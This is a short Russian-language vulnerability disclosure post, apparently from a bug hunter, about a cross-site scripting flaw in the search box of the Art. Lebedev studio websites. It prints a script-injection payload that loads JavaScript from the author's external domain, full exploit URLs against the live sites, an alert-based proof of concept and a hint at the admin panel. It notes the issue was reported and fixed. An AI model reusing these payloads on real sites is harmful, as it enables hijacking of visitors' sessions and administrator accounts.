SelfXSS to ActiveXSS in artlebedev

Привет,

Крч, я решил следовать последним трендами и сделать редизайн сайта Лебедева d(O_o)b и добавить немного анимаций. Тем более, что сделать это оказалось не так сложно ибо прогрузить с другого сайта JS через строку поиска позволяет сайт сам (фича может быть) 🙂

Заюзаю свой любимый “–>’></script><script/src=//ananev.me/xss.js></script>” просто в строку поиска и не буду мучиться. Да, круто, selfxss, но что-то они написали быстро в строку поиска тоже. О, тоже норм и тоже туда можно 🙂

http://artlebedev.com/search/?text=111j%22–%3E’%3E%3C/script%3E%3Cscript/src=//ananev.me/xss.js%3E%3C/script%3E%22

https://www.artlebedev.ru/search/?text=Wdffdf%22–%3E’%3E%3C/script%3E%3Cscript/src=//ananev.me/xss.js%3E%3C/script%3E%22

Поправьте, а то, как я знаю у вас на https://www.artlebedev.ru/admin/ админка есть и все такое 🙂

https://www.artlebedev.com/search/?text=Da:%22L:L%22;”;%3E%3Cscript%3Ealert(document.domain)%3C/script%3E 



История правок:
– Оповещение на mailbox@artlebedev.ru в 1:15 PM
– Исправлено в 5:59 PM